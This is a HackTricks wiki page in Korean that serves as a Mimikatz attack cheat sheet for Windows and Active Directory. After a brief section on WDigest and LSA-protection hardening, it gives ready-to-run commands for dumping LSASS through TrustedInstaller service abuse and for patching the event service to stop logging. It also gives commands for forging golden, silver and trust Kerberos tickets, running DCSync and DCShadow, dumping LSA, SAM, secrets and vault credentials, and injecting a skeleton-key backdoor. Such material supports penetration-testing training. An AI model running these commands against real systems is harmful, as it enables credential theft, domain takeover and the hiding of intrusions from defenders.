# Mimikatz {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} **์ด ํŽ˜์ด์ง€๋Š” [adsecurity.org](https://adsecurity.org/?page\_id=1821)์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ฉ๋‹ˆ๋‹ค**. ์ถ”๊ฐ€ ์ •๋ณด๋Š” ์›๋ณธ์„ ํ™•์ธํ•˜์„ธ์š”! ## LM ๋ฐ ๋ฉ”๋ชจ๋ฆฌ์˜ ํ‰๋ฌธ Windows 8.1 ๋ฐ Windows Server 2012 R2 ์ดํ›„๋กœ, ์ž๊ฒฉ ์ฆ๋ช… ๋„๋‚œ ๋ฐฉ์ง€๋ฅผ ์œ„ํ•œ ์ค‘์š”ํ•œ ์กฐ์น˜๊ฐ€ ์‹œํ–‰๋˜์—ˆ์Šต๋‹ˆ๋‹ค: - **LM ํ•ด์‹œ ๋ฐ ํ‰๋ฌธ ๋น„๋ฐ€๋ฒˆํ˜ธ**๋Š” ๋ณด์•ˆ์„ ๊ฐ•ํ™”ํ•˜๊ธฐ ์œ„ํ•ด ๋” ์ด์ƒ ๋ฉ”๋ชจ๋ฆฌ์— ์ €์žฅ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ํŠน์ • ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์„ค์ •์ธ _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_์„ DWORD ๊ฐ’ `0`์œผ๋กœ ์„ค์ •ํ•˜์—ฌ Digest Authentication์„ ๋น„ํ™œ์„ฑํ™”ํ•ด์•ผ ํ•˜๋ฉฐ, ์ด๋ฅผ ํ†ตํ•ด "ํ‰๋ฌธ" ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ LSASS์— ์บ์‹œ๋˜์ง€ ์•Š๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. - **LSA ๋ณดํ˜ธ**๋Š” ๋ฌด๋‹จ ๋ฉ”๋ชจ๋ฆฌ ์ฝ๊ธฐ ๋ฐ ์ฝ”๋“œ ์ฃผ์ž…์œผ๋กœ๋ถ€ํ„ฐ ๋กœ์ปฌ ๋ณด์•ˆ ๊ถŒํ•œ(LSA) ํ”„๋กœ์„ธ์Šค๋ฅผ ๋ณดํ˜ธํ•˜๊ธฐ ์œ„ํ•ด ๋„์ž…๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” LSASS๋ฅผ ๋ณดํ˜ธ๋œ ํ”„๋กœ์„ธ์Šค๋กœ ํ‘œ์‹œํ•จ์œผ๋กœ์จ ๋‹ฌ์„ฑ๋ฉ๋‹ˆ๋‹ค. LSA ๋ณดํ˜ธ๋ฅผ ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด: 1. _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_์—์„œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋ฅผ ์ˆ˜์ •ํ•˜์—ฌ `RunAsPPL`์„ `dword:00000001`๋กœ ์„ค์ •ํ•ฉ๋‹ˆ๋‹ค. 2. ๊ด€๋ฆฌ๋˜๋Š” ์žฅ์น˜์—์„œ ์ด ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ๋ณ€๊ฒฝ์„ ์‹œํ–‰ํ•˜๋Š” ๊ทธ๋ฃน ์ •์ฑ… ๊ฐœ์ฒด(GPO)๋ฅผ ๊ตฌํ˜„ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ณดํ˜ธ์—๋„ ๋ถˆ๊ตฌํ•˜๊ณ , Mimikatz์™€ ๊ฐ™์€ ๋„๊ตฌ๋Š” ํŠน์ • ๋“œ๋ผ์ด๋ฒ„๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ LSA ๋ณดํ˜ธ๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์ง€๋งŒ, ์ด๋Ÿฌํ•œ ํ–‰๋™์€ ์ด๋ฒคํŠธ ๋กœ๊ทธ์— ๊ธฐ๋ก๋  ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค. ### SeDebugPrivilege ์ œ๊ฑฐ์— ๋Œ€ํ•œ ๋Œ€์‘ ๊ด€๋ฆฌ์ž๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ SeDebugPrivilege๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์–ด ํ”„๋กœ๊ทธ๋žจ์„ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๊ถŒํ•œ์€ ๋ฌด๋‹จ ๋ฉ”๋ชจ๋ฆฌ ๋คํ”„๋ฅผ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ์ œํ•œ๋  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ ๋ฉ”๋ชจ๋ฆฌ์—์„œ ์ž๊ฒฉ ์ฆ๋ช…์„ ์ถ”์ถœํ•˜๋Š” ๋ฐ ์‚ฌ์šฉํ•˜๋Š” ์ผ๋ฐ˜์ ์ธ ๊ธฐ์ˆ ์ž…๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ์ด ๊ถŒํ•œ์ด ์ œ๊ฑฐ๋˜๋”๋ผ๋„, TrustedInstaller ๊ณ„์ •์€ ์‚ฌ์šฉ์ž ์ •์˜ ์„œ๋น„์Šค ๊ตฌ์„ฑ์„ ์‚ฌ์šฉํ•˜์—ฌ ์—ฌ์ „ํžˆ ๋ฉ”๋ชจ๋ฆฌ ๋คํ”„๋ฅผ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp" sc start TrustedInstaller ``` ์ด๊ฒƒ์€ `lsass.exe` ๋ฉ”๋ชจ๋ฆฌ๋ฅผ ํŒŒ์ผ๋กœ ๋คํ”„ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๋ฉฐ, ์ดํ›„ ๋‹ค๋ฅธ ์‹œ์Šคํ…œ์—์„œ ๋ถ„์„ํ•˜์—ฌ ์ž๊ฒฉ ์ฆ๋ช…์„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ``` # privilege::debug # sekurlsa::minidump lsass.dmp # sekurlsa::logonpasswords ``` ## Mimikatz ์˜ต์…˜ Mimikatz์—์„œ ์ด๋ฒคํŠธ ๋กœ๊ทธ ๋ณ€์กฐ๋Š” ๋‘ ๊ฐ€์ง€ ์ฃผ์š” ์ž‘์—…์„ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค: ์ด๋ฒคํŠธ ๋กœ๊ทธ ์ง€์šฐ๊ธฐ ๋ฐ ์ƒˆ๋กœ์šด ์ด๋ฒคํŠธ ๋กœ๊ทธ ์ƒ์„ฑ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•œ ์ด๋ฒคํŠธ ์„œ๋น„์Šค ํŒจ์น˜. ์•„๋ž˜๋Š” ์ด๋Ÿฌํ•œ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ๋ช…๋ น์–ด์ž…๋‹ˆ๋‹ค: #### ์ด๋ฒคํŠธ ๋กœ๊ทธ ์ง€์šฐ๊ธฐ - **๋ช…๋ น์–ด**: ์ด ์ž‘์—…์€ ์ด๋ฒคํŠธ ๋กœ๊ทธ๋ฅผ ์‚ญ์ œํ•˜์—ฌ ์•…์˜์ ์ธ ํ™œ๋™์„ ์ถ”์ ํ•˜๊ธฐ ์–ด๋ ต๊ฒŒ ๋งŒ๋“œ๋Š” ๊ฒƒ์„ ๋ชฉํ‘œ๋กœ ํ•ฉ๋‹ˆ๋‹ค. - Mimikatz๋Š” ๋ช…๋ น์ค„์„ ํ†ตํ•ด ์ด๋ฒคํŠธ ๋กœ๊ทธ๋ฅผ ์ง์ ‘ ์ง€์šฐ๊ธฐ ์œ„ํ•œ ์ง์ ‘์ ์ธ ๋ช…๋ น์–ด๋ฅผ ํ‘œ์ค€ ๋ฌธ์„œ์—์„œ ์ œ๊ณตํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ์ด๋ฒคํŠธ ๋กœ๊ทธ ์กฐ์ž‘์€ ์ผ๋ฐ˜์ ์œผ๋กœ Mimikatz ์™ธ๋ถ€์˜ ์‹œ์Šคํ…œ ๋„๊ตฌ๋‚˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํŠน์ • ๋กœ๊ทธ๋ฅผ ์ง€์šฐ๋Š” ๊ฒƒ์„ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค (์˜ˆ: PowerShell ๋˜๋Š” Windows ์ด๋ฒคํŠธ ๋ทฐ์–ด ์‚ฌ์šฉ). #### ์‹คํ—˜์  ๊ธฐ๋Šฅ: ์ด๋ฒคํŠธ ์„œ๋น„์Šค ํŒจ์น˜ - **๋ช…๋ น์–ด**: `event::drop` - ์ด ์‹คํ—˜์  ๋ช…๋ น์–ด๋Š” ์ด๋ฒคํŠธ ๋กœ๊น… ์„œ๋น„์Šค์˜ ๋™์ž‘์„ ์ˆ˜์ •ํ•˜์—ฌ ์ƒˆ๋กœ์šด ์ด๋ฒคํŠธ ๊ธฐ๋ก์„ ๋ฐฉ์ง€ํ•˜๋„๋ก ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. - ์˜ˆ์‹œ: `mimikatz "privilege::debug" "event::drop" exit` - `privilege::debug` ๋ช…๋ น์–ด๋Š” Mimikatz๊ฐ€ ์‹œ์Šคํ…œ ์„œ๋น„์Šค๋ฅผ ์ˆ˜์ •ํ•˜๋Š” ๋ฐ ํ•„์š”ํ•œ ๊ถŒํ•œ์œผ๋กœ ์ž‘๋™ํ•˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. - ๊ทธ ํ›„ `event::drop` ๋ช…๋ น์–ด๊ฐ€ ์ด๋ฒคํŠธ ๋กœ๊น… ์„œ๋น„์Šค๋ฅผ ํŒจ์น˜ํ•ฉ๋‹ˆ๋‹ค. ### Kerberos ํ‹ฐ์ผ“ ๊ณต๊ฒฉ ### ๊ณจ๋“  ํ‹ฐ์ผ“ ์ƒ์„ฑ ๊ณจ๋“  ํ‹ฐ์ผ“์€ ๋„๋ฉ”์ธ ์ „์ฒด ์ ‘๊ทผ์„ ๊ฐ€์žฅํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค. ์ฃผ์š” ๋ช…๋ น์–ด ๋ฐ ๋งค๊ฐœ๋ณ€์ˆ˜: - ๋ช…๋ น์–ด: `kerberos::golden` - ๋งค๊ฐœ๋ณ€์ˆ˜: - `/domain`: ๋„๋ฉ”์ธ ์ด๋ฆ„. - `/sid`: ๋„๋ฉ”์ธ์˜ ๋ณด์•ˆ ์‹๋ณ„์ž(SID). - `/user`: ๊ฐ€์žฅํ•  ์‚ฌ์šฉ์ž ์ด๋ฆ„. - `/krbtgt`: ๋„๋ฉ”์ธ์˜ KDC ์„œ๋น„์Šค ๊ณ„์ •์˜ NTLM ํ•ด์‹œ. - `/ptt`: ํ‹ฐ์ผ“์„ ๋ฉ”๋ชจ๋ฆฌ์— ์ง์ ‘ ์ฃผ์ž…ํ•ฉ๋‹ˆ๋‹ค. - `/ticket`: ๋‚˜์ค‘์— ์‚ฌ์šฉํ•  ํ‹ฐ์ผ“์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. ์˜ˆ์‹œ: ```bash mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit ``` ### Silver Ticket Creation Silver Tickets๋Š” ํŠน์ • ์„œ๋น„์Šค์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ฃผ์š” ๋ช…๋ น์–ด ๋ฐ ๋งค๊ฐœ๋ณ€์ˆ˜: - Command: Golden Ticket๊ณผ ์œ ์‚ฌํ•˜์ง€๋งŒ ํŠน์ • ์„œ๋น„์Šค๋ฅผ ๋Œ€์ƒ์œผ๋กœ ํ•ฉ๋‹ˆ๋‹ค. - Parameters: - `/service`: ๋Œ€์ƒ ์„œ๋น„์Šค (์˜ˆ: cifs, http). - ๊ธฐํƒ€ ๋งค๊ฐœ๋ณ€์ˆ˜๋Š” Golden Ticket๊ณผ ์œ ์‚ฌํ•ฉ๋‹ˆ๋‹ค. Example: ```bash mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit ``` ### Trust Ticket Creation Trust Tickets๋Š” ์‹ ๋ขฐ ๊ด€๊ณ„๋ฅผ ํ™œ์šฉํ•˜์—ฌ ๋„๋ฉ”์ธ ๊ฐ„ ๋ฆฌ์†Œ์Šค์— ์ ‘๊ทผํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. ์ฃผ์š” ๋ช…๋ น ๋ฐ ๋งค๊ฐœ๋ณ€์ˆ˜: - Command: Golden Ticket๊ณผ ์œ ์‚ฌํ•˜์ง€๋งŒ ์‹ ๋ขฐ ๊ด€๊ณ„์— ๋Œ€ํ•œ ๊ฒƒ์ž…๋‹ˆ๋‹ค. - Parameters: - `/target`: ๋Œ€์ƒ ๋„๋ฉ”์ธ์˜ FQDN. - `/rc4`: ์‹ ๋ขฐ ๊ณ„์ •์˜ NTLM ํ•ด์‹œ. Example: ```bash mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit ``` ### ์ถ”๊ฐ€ Kerberos ๋ช…๋ น์–ด - **ํ‹ฐ์ผ“ ๋ชฉ๋ก**: - ๋ช…๋ น์–ด: `kerberos::list` - ํ˜„์žฌ ์‚ฌ์šฉ์ž ์„ธ์…˜์˜ ๋ชจ๋“  Kerberos ํ‹ฐ์ผ“์„ ๋‚˜์—ดํ•ฉ๋‹ˆ๋‹ค. - **์บ์‹œ ์ „๋‹ฌ**: - ๋ช…๋ น์–ด: `kerberos::ptc` - ์บ์‹œ ํŒŒ์ผ์—์„œ Kerberos ํ‹ฐ์ผ“์„ ์ฃผ์ž…ํ•ฉ๋‹ˆ๋‹ค. - ์˜ˆ: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit` - **ํ‹ฐ์ผ“ ์ „๋‹ฌ**: - ๋ช…๋ น์–ด: `kerberos::ptt` - ๋‹ค๋ฅธ ์„ธ์…˜์—์„œ Kerberos ํ‹ฐ์ผ“์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. - ์˜ˆ: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit` - **ํ‹ฐ์ผ“ ์‚ญ์ œ**: - ๋ช…๋ น์–ด: `kerberos::purge` - ์„ธ์…˜์˜ ๋ชจ๋“  Kerberos ํ‹ฐ์ผ“์„ ์ง€์›๋‹ˆ๋‹ค. - ์ถฉ๋Œ์„ ํ”ผํ•˜๊ธฐ ์œ„ํ•ด ํ‹ฐ์ผ“ ์กฐ์ž‘ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜๊ธฐ ์ „์— ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค. ### Active Directory ๋ณ€์กฐ - **DCShadow**: AD ๊ฐ์ฒด ์กฐ์ž‘์„ ์œ„ํ•ด ๊ธฐ๊ณ„๋ฅผ DC์ฒ˜๋Ÿผ ์ž„์‹œ๋กœ ์ž‘๋™ํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit` - **DCSync**: DC๋ฅผ ๋ชจ๋ฐฉํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ฐ์ดํ„ฐ๋ฅผ ์š”์ฒญํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit` ### ์ž๊ฒฉ ์ฆ๋ช… ์ ‘๊ทผ - **LSADUMP::LSA**: LSA์—์„œ ์ž๊ฒฉ ์ฆ๋ช…์„ ์ถ”์ถœํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "lsadump::lsa /inject" exit` - **LSADUMP::NetSync**: ์ปดํ“จํ„ฐ ๊ณ„์ •์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ฐ์ดํ„ฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ DC๋ฅผ ๊ฐ€์žฅํ•ฉ๋‹ˆ๋‹ค. - *์›๋ณธ ๋งฅ๋ฝ์—์„œ NetSync์— ๋Œ€ํ•œ ํŠน์ • ๋ช…๋ น์–ด๊ฐ€ ์ œ๊ณต๋˜์ง€ ์•Š์Œ.* - **LSADUMP::SAM**: ๋กœ์ปฌ SAM ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์— ์ ‘๊ทผํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "lsadump::sam" exit` - **LSADUMP::Secrets**: ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ €์žฅ๋œ ๋น„๋ฐ€์„ ๋ณตํ˜ธํ™”ํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "lsadump::secrets" exit` - **LSADUMP::SetNTLM**: ์‚ฌ์šฉ์ž์— ๋Œ€ํ•œ ์ƒˆ๋กœ์šด NTLM ํ•ด์‹œ๋ฅผ ์„ค์ •ํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit` - **LSADUMP::Trust**: ์‹ ๋ขฐ ์ธ์ฆ ์ •๋ณด๋ฅผ ๊ฒ€์ƒ‰ํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "lsadump::trust" exit` ### ๊ธฐํƒ€ - **MISC::Skeleton**: DC์˜ LSASS์— ๋ฐฑ๋„์–ด๋ฅผ ์ฃผ์ž…ํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "privilege::debug" "misc::skeleton" exit` ### ๊ถŒํ•œ ์ƒ์Šน - **PRIVILEGE::Backup**: ๋ฐฑ์—… ๊ถŒํ•œ์„ ํš๋“ํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "privilege::backup" exit` - **PRIVILEGE::Debug**: ๋””๋ฒ„๊ทธ ๊ถŒํ•œ์„ ์–ป์Šต๋‹ˆ๋‹ค. - `mimikatz "privilege::debug" exit` ### ์ž๊ฒฉ ์ฆ๋ช… ๋คํ•‘ - **SEKURLSA::LogonPasswords**: ๋กœ๊ทธ์ธํ•œ ์‚ฌ์šฉ์ž์˜ ์ž๊ฒฉ ์ฆ๋ช…์„ ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "sekurlsa::logonpasswords" exit` - **SEKURLSA::Tickets**: ๋ฉ”๋ชจ๋ฆฌ์—์„œ Kerberos ํ‹ฐ์ผ“์„ ์ถ”์ถœํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "sekurlsa::tickets /export" exit` ### SID ๋ฐ ํ† ํฐ ์กฐ์ž‘ - **SID::add/modify**: SID ๋ฐ SIDHistory๋ฅผ ๋ณ€๊ฒฝํ•ฉ๋‹ˆ๋‹ค. - ์ถ”๊ฐ€: `mimikatz "sid::add /user:targetUser /sid:newSid" exit` - ์ˆ˜์ •: *์›๋ณธ ๋งฅ๋ฝ์—์„œ ์ˆ˜์ •์— ๋Œ€ํ•œ ํŠน์ • ๋ช…๋ น์–ด๊ฐ€ ์ œ๊ณต๋˜์ง€ ์•Š์Œ.* - **TOKEN::Elevate**: ํ† ํฐ์„ ๊ฐ€์žฅํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "token::elevate /domainadmin" exit` ### ํ„ฐ๋ฏธ๋„ ์„œ๋น„์Šค - **TS::MultiRDP**: ์—ฌ๋Ÿฌ RDP ์„ธ์…˜์„ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "ts::multirdp" exit` - **TS::Sessions**: TS/RDP ์„ธ์…˜์„ ๋‚˜์—ดํ•ฉ๋‹ˆ๋‹ค. - *์›๋ณธ ๋งฅ๋ฝ์—์„œ TS::Sessions์— ๋Œ€ํ•œ ํŠน์ • ๋ช…๋ น์–ด๊ฐ€ ์ œ๊ณต๋˜์ง€ ์•Š์Œ.* ### ๊ธˆ๊ณ  - Windows Vault์—์„œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ถ”์ถœํ•ฉ๋‹ˆ๋‹ค. - `mimikatz "vault::cred /patch" exit` {% hint style="success" %} AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks ์ง€์›ํ•˜๊ธฐ * [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! * **๐Ÿ’ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **Twitter**์—์„œ **ํŒ”๋กœ์šฐ**ํ•˜์„ธ์š”** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŒ์„ ๊ณต์œ ํ•˜์„ธ์š”.**
{% endhint %}